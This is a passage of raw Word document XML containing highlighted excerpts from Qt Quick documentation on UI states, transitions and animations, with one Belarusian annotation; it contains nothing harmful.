          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The state of a particular visual item is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set of information which describes how and where the individual component parts of the visual item are displayed within it</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>all the data associated with that state</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Most</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> visual items in a user-interface will have a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>limited number of states</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, each with </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>well-defined propert</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ies.</w:t>
      </w:r>
      <w:r w:rsidR="008B1DCE">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B1DCE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>// структурная асаблівасць інтэрфэйсаў //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00AE44AA" w:rsidP="00AE44AA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, an element in a list may be either selected or not, and if selected, it may either be the currently active single selection or it may be part of a selection group.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00AE44AA" w:rsidP="00AE44AA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Each of those </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>states</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> may </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>have</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> certain </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>associated visual appearance</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (neutral, highlighted, expanded, and so forth).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00AE44AA" w:rsidP="00AE44AA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick provides a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State</w:t>
      </w:r>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with properties which define its semantics and </w:t>
      </w:r>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be used to</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trigger behavior or animations</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. See the documentation about</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2390" w:history="1">
        <w:r w:rsidRPr="00AE44AA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick States</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00AE44AA" w:rsidP="008B1DCE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2023" w:name="transitions"/>
      <w:bookmarkStart w:id="2024" w:name="_Toc483000968"/>
      <w:bookmarkStart w:id="2025" w:name="_Toc483003959"/>
      <w:bookmarkStart w:id="2026" w:name="_Toc483604311"/>
      <w:bookmarkStart w:id="2027" w:name="_Toc483605531"/>
      <w:bookmarkEnd w:id="2023"/>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Transitions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2024"/>
      <w:bookmarkEnd w:id="2025"/>
      <w:bookmarkEnd w:id="2026"/>
      <w:bookmarkEnd w:id="2027"/>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00AE44AA" w:rsidP="00AE44AA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">When a visual item transitions from one state to another, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>appearance</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of that item </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will change</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. A transition is an "</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>edge</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">" between two states. It may </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trigger other events</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to occur, as other parts of the application may have behavior which is </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>triggered when a certain state is</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> entered or left.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00AE44AA" w:rsidP="00AE44AA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick provides the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Transition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type which has properties which define what will occur when the application changes from one state to another. See the documentation on</w:t>
      </w:r>
      <w:r w:rsidR="00365F6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2391" w:anchor="transitions-during-state-changes" w:history="1">
        <w:r w:rsidRPr="00AE44AA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Transitions during State Changes</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00365F6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information about transitions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00AE44AA" w:rsidP="008B1DCE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2028" w:name="_Toc483000969"/>
      <w:bookmarkStart w:id="2029" w:name="_Toc483003960"/>
      <w:bookmarkStart w:id="2030" w:name="_Toc483604312"/>
      <w:bookmarkStart w:id="2031" w:name="_Toc483605532"/>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Animations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2028"/>
      <w:bookmarkEnd w:id="2029"/>
      <w:bookmarkEnd w:id="2030"/>
      <w:bookmarkEnd w:id="2031"/>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00AE44AA" w:rsidP="00AE44AA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When transitioning</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> between states, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">fluid </w:t>
      </w:r>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>animation</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to aid the user during the transition. </w:t>
      </w:r>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Abrupt and unexpected</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> changes to the visual canvas result in a suboptimal user-experience and </w:t>
      </w:r>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>should be avoided</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00AE44AA" w:rsidP="00AE44AA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If an element in a list becomes </w:t>
      </w:r>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>selected</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>color change</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (from neutral to highlighted) can be animated. If the </w:t>
      </w:r>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the element in the list is </w:t>
      </w:r>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>changed</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, it can </w:t>
      </w:r>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>be moved</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in an fluidly animated fashion so that the </w:t>
      </w:r>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eye</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the user </w:t>
      </w:r>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can track the change</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00AE44AA" w:rsidP="00AE44AA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>These types of animations are supported in Qt Quick through various animation and transition types. See the documentation on</w:t>
      </w:r>
      <w:r w:rsidR="00365F6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2392" w:history="1">
        <w:r w:rsidRPr="00AE44AA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Animations and Transitions In Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00365F6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for information about these types and how to use them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00AE44AA" w:rsidP="008B1DCE">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2032" w:name="animating-property-assignments"/>
      <w:bookmarkStart w:id="2033" w:name="_Toc483000970"/>
      <w:bookmarkStart w:id="2034" w:name="_Toc483003961"/>
      <w:bookmarkStart w:id="2035" w:name="_Toc483604313"/>
      <w:bookmarkStart w:id="2036" w:name="_Toc483605533"/>
      <w:bookmarkEnd w:id="2032"/>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Animating Property Assignments</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2033"/>
      <w:bookmarkEnd w:id="2034"/>
      <w:bookmarkEnd w:id="2035"/>
      <w:bookmarkEnd w:id="2036"/>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00AE44AA" w:rsidP="00AE44AA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Animations</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are </w:t>
      </w:r>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not only related to states and transitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> between states. For example, </w:t>
      </w:r>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>an animation might be triggered by other event</w:t>
      </w:r>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
